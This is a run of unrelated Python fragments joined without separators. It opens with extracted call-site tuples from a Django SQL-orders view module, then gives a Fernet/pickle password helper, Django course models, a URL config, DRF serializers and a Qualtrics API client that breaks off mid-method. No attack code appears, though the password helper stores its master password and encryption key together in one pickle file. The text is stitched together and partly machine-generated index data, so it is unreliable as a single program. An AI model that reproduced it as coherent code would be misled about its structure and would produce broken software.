serializers\n'), ((2598, 2663), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""', 'flat': '(True)'}), "(message=serializer.errors, code='0001', flat=True)\n", (2612, 2663), False, 'from libs.response import JsonResponseV1\n'), ((3069, 3134), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""', 'flat': '(True)'}), "(message=serializer.errors, code='0001', flat=True)\n", (3083, 3134), False, 'from libs.response import JsonResponseV1\n'), ((4470, 4508), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', (['render_columns'], {}), '(render_columns)\n', (4492, 4508), False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((5053, 5089), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'serializer.data'}), '(data=serializer.data)\n', (5067, 5089), False, 'from libs.response import JsonResponseV1\n'), ((5854, 5908), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""'}), "(message=serializer.errors, code='0001')\n", 
(5868, 5908), False, 'from libs.response import JsonResponseV1\n'), ((6360, 6414), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""'}), "(message=serializer.errors, code='0001')\n", (6374, 6414), False, 'from libs.response import JsonResponseV1\n'), ((6860, 6914), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""'}), "(message=serializer.errors, code='0001')\n", (6874, 6914), False, 'from libs.response import JsonResponseV1\n'), ((7362, 7416), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""'}), "(message=serializer.errors, code='0001')\n", (7376, 7416), False, 'from libs.response import JsonResponseV1\n'), ((7588, 7651), 'sqlorders.serializers.GenerateSqlOrdersTasksSerializer', 'serializers.GenerateSqlOrdersTasksSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (7632, 7651), False, 'from sqlorders import models, serializers\n'), ((7791, 7856), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""', 'flat': '(True)'}), "(message=serializer.errors, code='0001', flat=True)\n", (7805, 7856), False, 'from libs.response import JsonResponseV1\n'), ((8120, 8148), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'task_id'}), '(data=task_id)\n', (8134, 8148), False, 'from libs.response import JsonResponseV1\n'), ((10184, 10222), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', (['render_columns'], {}), '(render_columns)\n', (10206, 10222), False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((12611, 12649), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', (['render_columns'], {}), '(render_columns)\n', (12633, 12649), False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((12935, 12993), 'sqlorders.serializers.ExecuteSingleTaskSerializer', 'serializers.ExecuteSingleTaskSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (12974, 12993), False, 'from sqlorders import models, serializers\n'), ((13142, 13207), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""', 'flat': '(True)'}), "(message=serializer.errors, code='0001', flat=True)\n", (13156, 13207), False, 'from libs.response import JsonResponseV1\n'), ((13383, 13441), 'sqlorders.serializers.ExecuteMultiTasksSerializer', 'serializers.ExecuteMultiTasksSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (13422, 13441), False, 'from sqlorders import models, serializers\n'), ((13590, 13655), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""', 'flat': '(True)'}), "(message=serializer.errors, code='0001', flat=True)\n", (13604, 13655), False, 'from libs.response import JsonResponseV1\n'), ((13826, 13879), 'sqlorders.serializers.ThrottleTaskSerializer', 'serializers.ThrottleTaskSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (13860, 13879), False, 'from sqlorders import models, serializers\n'), ((14031, 14096), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""', 'flat': '(True)'}), "(message=serializer.errors, code='0001', flat=True)\n", (14045, 14096), False, 'from libs.response import JsonResponseV1\n'), ((14540, 14576), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 
'serializer.data'}), '(data=serializer.data)\n', (14554, 14576), False, 'from libs.response import JsonResponseV1\n'), ((14639, 14819), 'libs.permissions.anyof', 'permissions.anyof', (['permissions.CanCommitOrdersPermission', 'permissions.CanViewOrdersPermission', 'permissions.CanExecuteOrdersPermission', 'permissions.CanAuditOrdersPermission'], {}), '(permissions.CanCommitOrdersPermission, permissions.\n CanViewOrdersPermission, permissions.CanExecuteOrdersPermission,\n permissions.CanAuditOrdersPermission)\n', (14656, 14819), False, 'from libs import permissions\n'), ((15040, 15094), 'sqlorders.serializers.HookSqlOrdersSerializer', 'serializers.HookSqlOrdersSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (15075, 15094), False, 'from sqlorders import models, serializers\n'), ((15233, 15298), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""', 'flat': '(True)'}), "(message=serializer.errors, code='0001', flat=True)\n", (15247, 15298), False, 'from libs.response import JsonResponseV1\n'), ((15655, 15708), 'sqlorders.models.DbExportFiles.objects.get', 'models.DbExportFiles.objects.get', ([], {'file_name': 'file_name'}), '(file_name=file_name)\n', (15687, 15708), False, 'from sqlorders import models, serializers\n'), ((15936, 15987), 'django.http.HttpResponse', 'HttpResponse', (['fsock'], {'content_type': '"""application/zip"""'}), "(fsock, content_type='application/zip')\n", (15948, 15987), False, 'from django.http import Http404, HttpResponse\n'), ((16616, 16645), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'queryset'}), '(data=queryset)\n', (16630, 16645), False, 'from libs.response import JsonResponseV1\n'), ((17647, 17685), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', (['render_columns'], {}), '(render_columns)\n', (17669, 17685), False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((18244, 18309), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'code': '"""0001"""', 'message': 'serializer.errors', 'flat': '(True)'}), "(code='0001', message=serializer.errors, flat=True)\n", (18258, 18309), False, 'from libs.response import JsonResponseV1\n'), ((18810, 18875), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'code': '"""0001"""', 'message': 'serializer.errors', 'flat': '(True)'}), "(code='0001', message=serializer.errors, flat=True)\n", (18824, 18875), False, 'from libs.response import JsonResponseV1\n'), ((19236, 19266), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': '"""删除成功"""'}), "(message='删除成功')\n", (19250, 19266), False, 'from libs.response import JsonResponseV1\n'), ((19551, 19600), 'sqlorders.models.DbEnvironment.objects.values', 'models.DbEnvironment.objects.values', (['"""id"""', '"""name"""'], {}), "('id', 'name')\n", (19586, 19600), False, 'from sqlorders import models, serializers\n'), ((20075, 20109), 'sqlorders.models.DbOrders.objects.raw', 'models.DbOrders.objects.raw', (['query'], {}), '(query)\n', (20102, 20109), False, 'from sqlorders import models, serializers\n'), ((20811, 20849), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', (['render_columns'], {}), '(render_columns)\n', (20833, 20849), False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((20915, 20940), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'data'}), '(data=data)\n', (20929, 20940), False, 'from libs.response import JsonResponseV1\n'), ((1365, 1402), 
'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'serializer.query'}), '(data=serializer.query)\n', (1379, 1402), False, 'from libs.response import JsonResponseV1\n'), ((2216, 2254), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', (['render_columns'], {}), '(render_columns)\n', (2238, 2254), False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((2540, 2582), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'data', 'message': 'message'}), '(data=data, message=message)\n', (2554, 2582), False, 'from libs.response import JsonResponseV1\n'), ((3023, 3053), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': '"""提交成功"""'}), "(message='提交成功')\n", (3037, 3053), False, 'from libs.response import JsonResponseV1\n'), ((5275, 5309), 'sqlorders.models.DbOrders.objects.get', 'models.DbOrders.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (5302, 5309), False, 'from sqlorders import models, serializers\n'), ((5786, 5838), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'serializer.data', 'message': '"""操作成功"""'}), "(data=serializer.data, message='操作成功')\n", (5800, 5838), False, 'from libs.response import JsonResponseV1\n'), ((6292, 6344), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'serializer.data', 'message': '"""操作成功"""'}), "(data=serializer.data, message='操作成功')\n", (6306, 6344), False, 'from libs.response import JsonResponseV1\n'), ((6792, 6844), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'serializer.data', 'message': '"""操作成功"""'}), "(data=serializer.data, message='操作成功')\n", (6806, 6844), False, 'from libs.response import JsonResponseV1\n'), ((7294, 7346), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'serializer.data', 'message': '"""操作成功"""'}), "(data=serializer.data, message='操作成功')\n", (7308, 7346), False, 'from libs.response import JsonResponseV1\n'), ((7750, 7775), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'data'}), '(data=data)\n', (7764, 7775), False, 'from libs.response import JsonResponseV1\n'), ((13088, 13126), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': '"""任务提交成功,请查看输出"""'}), "(message='任务提交成功,请查看输出')\n", (13102, 13126), False, 'from libs.response import JsonResponseV1\n'), ((13536, 13574), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': '"""任务提交成功,请查看输出"""'}), "(message='任务提交成功,请查看输出')\n", (13550, 13574), False, 'from libs.response import JsonResponseV1\n'), ((13984, 14015), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'message'}), '(message=message)\n', (13998, 14015), False, 'from libs.response import JsonResponseV1\n'), ((15179, 15217), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': '"""任务提交成功,请查看输出"""'}), "(message='任务提交成功,请查看输出')\n", (15193, 15217), False, 'from libs.response import JsonResponseV1\n'), ((15834, 15866), 'rest_framework.exceptions.PermissionDenied', 'PermissionDenied', ([], {'detail': '"""您没有权限"""'}), "(detail='您没有权限')\n", (15850, 15866), False, 'from rest_framework.exceptions import PermissionDenied\n'), ((16207, 16221), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (16219, 16221), False, 'from django.utils import timezone\n'), ((16224, 16251), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(30)'}), '(days=30)\n', (16242, 16251), False, 'import datetime\n'), ((18198, 18228), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': '"""创建成功"""'}), 
"(message='创建成功')\n", (18212, 18228), False, 'from libs.response import JsonResponseV1\n'), ((18764, 18794), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': '"""更新成功"""'}), "(message='更新成功')\n", (18778, 18794), False, 'from libs.response import JsonResponseV1\n'), ((19460, 19511), 'sqlorders.models.ReleaseVersions.objects.get', 'models.ReleaseVersions.objects.get', ([], {'version': 'version'}), '(version=version)\n', (19494, 19511), False, 'from sqlorders import models, serializers\n'), ((9339, 9395), 'rest_framework.exceptions.PermissionDenied', 'PermissionDenied', ([], {'detail': '"""您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面"""'}), "(detail='您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面')\n", (9355, 9395), False, 'from rest_framework.exceptions import PermissionDenied\n'), ((11740, 11796), 'rest_framework.exceptions.PermissionDenied', 'PermissionDenied', ([], {'detail': '"""您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面"""'}), "(detail='您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面')\n", (11756, 11796), False, 'from rest_framework.exceptions import PermissionDenied\n'), ((15488, 15521), 'base64.b64decode', 'base64.b64decode', (['base64_filename'], {}), '(base64_filename)\n', (15504, 15521), False, 'import base64\n'), ((18577, 18629), 'sqlorders.models.ReleaseVersions.objects.get', 'models.ReleaseVersions.objects.get', ([], {'pk': "kwargs['key']"}), "(pk=kwargs['key'])\n", (18611, 18629), False, 'from sqlorders import models, serializers\n'), ((8027, 8088), 'sqlorders.models.DbOrdersExecuteTasks.objects.filter', 'models.DbOrdersExecuteTasks.objects.filter', ([], {'order_id': 'order_id'}), '(order_id=order_id)\n', (8069, 8088), False, 'from sqlorders import models, serializers\n'), ((15547, 15603), 'sqlorders.models.DbExportFiles.objects.filter', 'models.DbExportFiles.objects.filter', ([], {'file_name': 'file_name'}), '(file_name=file_name)\n', (15582, 15603), False, 'from sqlorders import models, serializers\n'), ((15724, 15779), 'sqlorders.models.DbOrdersExecuteTasks.objects.get', 'models.DbOrdersExecuteTasks.objects.get', ([], {'pk': 'obj.task_id'}), '(pk=obj.task_id)\n', (15763, 15779), False, 'from sqlorders import models, serializers\n'), ((16548, 16562), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (16560, 16562), False, 'from django.utils import timezone\n'), ((9142, 9165), 'json.loads', 'json.loads', (['obj.auditor'], {}), '(obj.auditor)\n', (9152, 9165), False, 'import json\n'), ((9226, 9250), 'json.loads', 'json.loads', (['obj.reviewer'], {}), '(obj.reviewer)\n', (9236, 9250), False, 'import json\n'), ((11543, 11566), 'json.loads', 'json.loads', (['obj.auditor'], {}), '(obj.auditor)\n', (11553, 11566), False, 'import json\n'), ((11627, 11651), 'json.loads', 'json.loads', (['obj.reviewer'], {}), '(obj.reviewer)\n', (11637, 11651), False, 'import json\n'), ((16272, 16342), 'sqlorders.models.ReleaseVersions.objects.filter', 'models.ReleaseVersions.objects.filter', ([], {'expire_time__gte': 'before_30_days'}), '(expire_time__gte=before_30_days)\n', (16309, 16342), False, 'from sqlorders import models, serializers\n'), ((8882, 8941), 'sqlorders.models.DbOrdersExecuteTasks.objects.filter', 'models.DbOrdersExecuteTasks.objects.filter', ([], {'task_id': 'task_id'}), '(task_id=task_id)\n', (8924, 8941), False, 'from sqlorders import models, serializers\n'), ((11283, 11342), 'sqlorders.models.DbOrdersExecuteTasks.objects.filter', 'models.DbOrdersExecuteTasks.objects.filter', ([], {'task_id': 'task_id'}), '(task_id=task_id)\n', (11325, 11342), False, 'from sqlorders import models, serializers\n')] |
# Importing Fernet class
from cryptography.fernet import Fernet
# Importing dump and load function
from pickle import dump,load
# To generate a strong pw
def generate_pw():
from random import choice
choices = list("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_-+=.,/<>?;:\\|[]}{")
pw = ""
for i in range(25):
pw += choice(choices)
return pw
# To get master pw from the file
def get_masterpw():
# Opening the file storing master pw
with open("key.key",'rb') as file:
# Loading data
keys = load(file)
# Master pw is converted from bytes to string
key = keys[0].decode()
del keys
# Return keys
return key
# To get key from the file
def get_key():
# Opening the file storing master pw
with open("key.key",'rb') as file:
# Loading data
keys = load(file)
# Key is converted from bytes to string
key = keys[1].decode()
del keys
# Return keys
return key
# To store master pw in the file
def add_keys(masterpw,key):
# Opening the file to store master pw
with open("key.key",'wb') as file:
# Making list of value to upload
# key is already in bytes # Converting to bytes is not necessary
keys = [masterpw.encode(),key]
# Dumping the master pw to file
dump(keys,file)
# Deleting the variable
del masterpw,key,keys
# Checking if user is running program for first time
def is_1st_time():
# Trying to open bytes file
    # If the file opens, the program has been executed once or more before
try:
with open("key.key",'rb') as file:
pass
return False
    # FileNotFoundError means it's the first time
    # Or it's not in the directory of this file, or the user deleted it :)
except FileNotFoundError:
return True
# Function to copy pw to clipboard
def copy2clip(pw):
# Importing copy function
from pyperclip import copy
# Copying pw to clipboard
copy(pw)
del pw,copy
# Encrypting the text
def encrypt(text, key):
try:
# Defining Fernet(class) using the key
fernet = Fernet(key)
# Encryption # Text is converted to bytes
encrypted_text = fernet.encrypt(text.encode())
del key
# Return encrypted text
return encrypted_text
# Error message if any
except Exception as e:
print(f"Error occured:{e}\nProcess failed!")
# Decrypting the text
def decrypt(text, key):
try:
# Defining Fernet(class) using the key
fernet = Fernet(key)
# Decryption # Text is converted from bytes to string
decrypted_text = fernet.decrypt(text).decode()
del key
# Return decrypted text
return decrypted_text
# Error message if any
except Exception as e:
print(f"Error occured:{e}\nProcess failed!") | [
"random.choice",
"pickle.dump",
"pickle.load",
"pyperclip.copy",
"cryptography.fernet.Fernet"
]
| [((2100, 2108), 'pyperclip.copy', 'copy', (['pw'], {}), '(pw)\n', (2104, 2108), False, 'from pyperclip import copy\n'), ((379, 394), 'random.choice', 'choice', (['choices'], {}), '(choices)\n', (385, 394), False, 'from random import choice\n'), ((608, 618), 'pickle.load', 'load', (['file'], {}), '(file)\n', (612, 618), False, 'from pickle import dump, load\n'), ((927, 937), 'pickle.load', 'load', (['file'], {}), '(file)\n', (931, 937), False, 'from pickle import dump, load\n'), ((1427, 1443), 'pickle.dump', 'dump', (['keys', 'file'], {}), '(keys, file)\n', (1431, 1443), False, 'from pickle import dump, load\n'), ((2252, 2263), 'cryptography.fernet.Fernet', 'Fernet', (['key'], {}), '(key)\n', (2258, 2263), False, 'from cryptography.fernet import Fernet\n'), ((2688, 2699), 'cryptography.fernet.Fernet', 'Fernet', (['key'], {}), '(key)\n', (2694, 2699), False, 'from cryptography.fernet import Fernet\n')] |
from django.db import models
from django.utils import timezone
# Course Category
class Course_category(models.Model):
category_id = models.AutoField(primary_key=True)
category_name = models.CharField(max_length=100)
date_of_creation = models.DateTimeField(default=timezone.now)
# Course Subcategory
class Course_subcategory(models.Model):
subcategory_id = models.AutoField(primary_key=True)
category = models.ForeignKey(Course_category, on_delete=models.CASCADE)
subcategory_name = models.CharField(max_length=100)
date_of_creation = models.DateTimeField(default=timezone.now)
# Course
class Course(models.Model):
course_id = models.AutoField(primary_key=True)
subcategory = models.ForeignKey(Course_subcategory, on_delete=models.CASCADE)
subcategory_name = models.CharField(max_length=100)
category_name = models.CharField(max_length=100)
course_name = models.CharField(max_length=100)
date_of_creation = models.DateTimeField(default=timezone.now)
course_description = models.TextField(default="")
course_difficulty = models.CharField(max_length=30)
# Course resources
class Course_resource(models.Model):
course = models.ForeignKey(Course, on_delete=models.CASCADE)
resourse_content = models.TextField(default="NIL")
resourse_name = models.CharField(max_length=100)
resourse_link = models.CharField(max_length=200)
resourse_length = models.CharField(max_length=10)
date_of_creation = models.DateTimeField(default=timezone.now)
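# An illustrative ORM usage sketch (an assumption, not part of the original app), e.g. for a
# Django shell session or a data-seeding script; all literal values are placeholders.
def seed_example_course():
    category = Course_category.objects.create(category_name="Programming")
    subcategory = Course_subcategory.objects.create(
        category=category, subcategory_name="Python")
    return Course.objects.create(
        subcategory=subcategory,
        subcategory_name=subcategory.subcategory_name,
        category_name=category.category_name,
        course_name="Django Basics",
        course_description="An introductory course.",
        course_difficulty="Beginner",
    )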
| [
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.db.models.AutoField",
"django.db.models.DateTimeField",
"django.db.models.CharField"
]
| [((137, 171), 'django.db.models.AutoField', 'models.AutoField', ([], {'primary_key': '(True)'}), '(primary_key=True)\n', (153, 171), False, 'from django.db import models\n'), ((192, 224), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (208, 224), False, 'from django.db import models\n'), ((248, 290), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now'}), '(default=timezone.now)\n', (268, 290), False, 'from django.db import models\n'), ((375, 409), 'django.db.models.AutoField', 'models.AutoField', ([], {'primary_key': '(True)'}), '(primary_key=True)\n', (391, 409), False, 'from django.db import models\n'), ((425, 485), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Course_category'], {'on_delete': 'models.CASCADE'}), '(Course_category, on_delete=models.CASCADE)\n', (442, 485), False, 'from django.db import models\n'), ((509, 541), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (525, 541), False, 'from django.db import models\n'), ((565, 607), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now'}), '(default=timezone.now)\n', (585, 607), False, 'from django.db import models\n'), ((662, 696), 'django.db.models.AutoField', 'models.AutoField', ([], {'primary_key': '(True)'}), '(primary_key=True)\n', (678, 696), False, 'from django.db import models\n'), ((715, 778), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Course_subcategory'], {'on_delete': 'models.CASCADE'}), '(Course_subcategory, on_delete=models.CASCADE)\n', (732, 778), False, 'from django.db import models\n'), ((802, 834), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (818, 834), False, 'from django.db import models\n'), ((855, 887), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (871, 887), False, 'from django.db import models\n'), ((906, 938), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (922, 938), False, 'from django.db import models\n'), ((962, 1004), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now'}), '(default=timezone.now)\n', (982, 1004), False, 'from django.db import models\n'), ((1030, 1058), 'django.db.models.TextField', 'models.TextField', ([], {'default': '""""""'}), "(default='')\n", (1046, 1058), False, 'from django.db import models\n'), ((1083, 1114), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)'}), '(max_length=30)\n', (1099, 1114), False, 'from django.db import models\n'), ((1185, 1236), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Course'], {'on_delete': 'models.CASCADE'}), '(Course, on_delete=models.CASCADE)\n', (1202, 1236), False, 'from django.db import models\n'), ((1260, 1291), 'django.db.models.TextField', 'models.TextField', ([], {'default': '"""NIL"""'}), "(default='NIL')\n", (1276, 1291), False, 'from django.db import models\n'), ((1312, 1344), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (1328, 1344), False, 'from django.db import models\n'), ((1365, 1397), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (1381, 1397), False, 'from django.db import models\n'), ((1420, 1451), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': 
'(10)'}), '(max_length=10)\n', (1436, 1451), False, 'from django.db import models\n'), ((1475, 1517), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now'}), '(default=timezone.now)\n', (1495, 1517), False, 'from django.db import models\n')] |
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
urlpatterns = [
# Examples:
# url(r'^$', 'evetool.views.home', name='home'),
url(r'^', include('users.urls')),
url(r'^', include('apis.urls')),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
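# Note: django.conf.urls.static.static() returns an empty pattern list unless settings.DEBUG
# is True, so the static() fallback above only serves files during development.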
| [
"django.conf.urls.include",
"django.conf.urls.static.static"
]
| [((283, 346), 'django.conf.urls.static.static', 'static', (['settings.STATIC_URL'], {'document_root': 'settings.STATIC_ROOT'}), '(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n', (289, 346), False, 'from django.conf.urls.static import static\n'), ((218, 239), 'django.conf.urls.include', 'include', (['"""users.urls"""'], {}), "('users.urls')\n", (225, 239), False, 'from django.conf.urls import include, url\n'), ((256, 276), 'django.conf.urls.include', 'include', (['"""apis.urls"""'], {}), "('apis.urls')\n", (263, 276), False, 'from django.conf.urls import include, url\n')] |
from rest_framework import serializers
from applications.models import Application
class ApplicationSerializer(serializers.Serializer):
content = serializers.JSONField()
portfolio = serializers.FileField()
class ApplicationAdminSerializer(serializers.ModelSerializer):
class Meta:
model = Application
fields = ['content', 'user', 'status', 'created_at', 'updated_at', 'recruits']
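# A minimal validation sketch (an assumption, not part of the original module) showing how
# ApplicationSerializer above might be used; `data` would typically combine request.data and
# request.FILES so that `portfolio` receives an uploaded file.
def validate_application(data):
    serializer = ApplicationSerializer(data=data)
    serializer.is_valid(raise_exception=True)
    return serializer.validated_data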
class ApplicationAdminPatchSerializer(serializers.ModelSerializer):
class Meta:
model = Application
        fields = ['status']
| [
"rest_framework.serializers.FileField",
"rest_framework.serializers.JSONField"
]
| [((154, 177), 'rest_framework.serializers.JSONField', 'serializers.JSONField', ([], {}), '()\n', (175, 177), False, 'from rest_framework import serializers\n'), ((194, 217), 'rest_framework.serializers.FileField', 'serializers.FileField', ([], {}), '()\n', (215, 217), False, 'from rest_framework import serializers\n')] |
from pathlib import Path
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
# api_token = "<KEY>"
# brand_center = "mdanderson.co1"
# data_center = "iad1"
# headers = {"x-api-token": api_token}
class QualtricsTool:
"""Data model to manage Qualtrics-related tools
Parameters:
-----------
api_token: str, the API token for the user
data_center: str, the data center for the user
brand_center: str, the brand center for the user
"""
def __init__(self, api_token=None, data_center=None, brand_center=None):
self.api_token = api_token
self.data_center = data_center
self.brand_center = brand_center
@property
def api_headers(self):
"""The default API headers"""
return {"x-api-token": self.api_token}
@property
def base_url(self):
"""The default base URL"""
return f"https://{self.data_center}.qualtrics.com"
@property
def api_base_url(self):
"""The default base API URL"""
return f"{self.base_url}/API/v3"
def upload_images_api(self,
local_image_folder,
library_id,
creating_full_url=True,
qualtrics_folder=None,
filename_pattern="*"):
"""Upload images from the local folder to the Qualtrics server
:param local_image_folder: str, Path, the local folder containing the images
:param library_id: str, Qualtrics library ID number
:param creating_full_url: bool, whether returns the IDs only or the full URLs
:param qualtrics_folder: str, the Qualtrics Graphics folder for the uploaded images
:param filename_pattern: str, the pattern using which to select the images for uploading
:return list[str], the list of image IDs or URLs
"""
upload_url = f"{self.api_base_url}/libraries/{library_id}/graphics"
image_urls = list()
for file in Path(local_image_folder).glob(filename_pattern):
            file_type = Path(file).suffix[1:]
if file_type not in ("png", "gif", "jpg", "jpeg"):
raise ValueError("Qualtrics only accepts PNG, GIF, and JPEG images.")
encoded_fields = {'file': (file.name, open(file, 'rb'), f'image/{file_type}')}
image_url_id = self._upload_image(encoded_fields, qualtrics_folder, upload_url, file, creating_full_url)
image_urls.append(image_url_id)
return image_urls
def upload_images_web(self,
image_files,
library_id,
creating_full_url,
qualtrics_folder,
image_type):
"""Upload images from the web app to the Qualtrics server
:param image_files: Bytes, the uploaded bytes data from the web app
:param library_id: str, Qualtrics library ID number
:param creating_full_url: bool, whether returns the IDs only or the full URLs
:param qualtrics_folder: str, the Qualtrics Graphics folder for the uploaded images
:param image_type: str, the image file type
:return list[str], the list of image IDs or URLs
"""
image_urls = list()
upload_url = f"{self.api_base_url}/libraries/{library_id}/graphics"
file_count_digit = len(str(len(image_files)))
for file_i, file in enumerate(image_files, start=1):
encoded_fields = {'file': (f"image{file_i:0>{file_count_digit}}.{image_type}", file, f'image/{image_type}')}
image_url_id = self._upload_image(encoded_fields, qualtrics_folder, upload_url, file, creating_full_url)
image_urls.append(image_url_id)
return image_urls
def _upload_image(self, encoded_fields, qualtrics_folder, upload_url, file, creating_full_url):
if qualtrics_folder:
encoded_fields['folder'] = qualtrics_folder
mp_encoder = MultipartEncoder(fields=encoded_fields)
post_request = requests.post(
upload_url,
data=mp_encoder,
headers={'Content-Type': mp_encoder.content_type, **self.api_headers}
)
try:
image_url_id = post_request.json()['result']['id']
except KeyError:
raise Exception(f"Failed to upload image {file.name}")
if creating_full_url:
image_url_id = f"{self.base_url}/ControlPanel/Graphic.php?IM={image_url_id}"
return image_url_id
def delete_images(self, library_id, image_url_ids):
"""Delete images from the specified library
:param library_id: str, the library ID number
:param image_url_ids: list[str], the image IDs or full URLs
:return dict, the deletion report"""
report = dict()
for image_url_id in image_url_ids:
if image_url_id.find("=") > 0:
image_url_id = image_url_id[image_url_id.index("=") + 1:]
url = f'{self.api_base_url}/libraries/{library_id}/graphics/{image_url_id}'
delete_response = requests.delete(url, headers=self.api_headers)
try:
http_status = delete_response.json()['meta']['httpStatus']
except KeyError:
raise Exception(f"Failed to delete image: {image_url_id}")
else:
report[image_url_id] = "Deleted" if http_status.startswith('200') else "Error"
return report
def create_survey(self, template_json):
"""Create the survey using the JSON template
:param template_json: str in the JSON format, the JSON file for the qsf file
:return str, the created Survey ID number
"""
upload_url = f"{self.api_base_url}/survey-definitions"
creation_response = requests.post(
upload_url,
json=template_json,
headers={**self.api_headers, "content-type": "application/json"}
)
try:
survey_id = creation_response.json()['result']['SurveyID']
except KeyError:
raise Exception("Couldn't create the survey. Please check the params.")
return survey_id
def delete_survey(self, survey_id):
"""Delete the survey
:param survey_id: str, the survey ID number
:return dict, the deletion report
"""
report = dict()
delete_url = f"{self.api_base_url}/survey-definitions/{survey_id}"
delete_response = requests.delete(delete_url, headers=self.api_headers)
try:
http_status = delete_response.json()['meta']['httpStatus']
except KeyError:
raise Exception(f"Failed to delete survey: {survey_id}")
else:
report[survey_id] = "Deleted" if http_status.startswith('200') else "Error"
return report
def export_responses(self, survey_id, file_format="csv", data_folder=None):
"""Export responses from the Qualtrics survey"""
download_url = f"{self.api_base_url}/surveys/{survey_id}/export-responses/"
download_payload = f'{{"format": "{file_format}"}}'
download_response = requests.post(
download_url,
data=download_payload,
headers={**self.api_headers, "content-type": "application/json"}
)
try:
progress_id = download_response.json()["result"]["progressId"]
file_id = self._monitor_progress(download_url, progress_id)
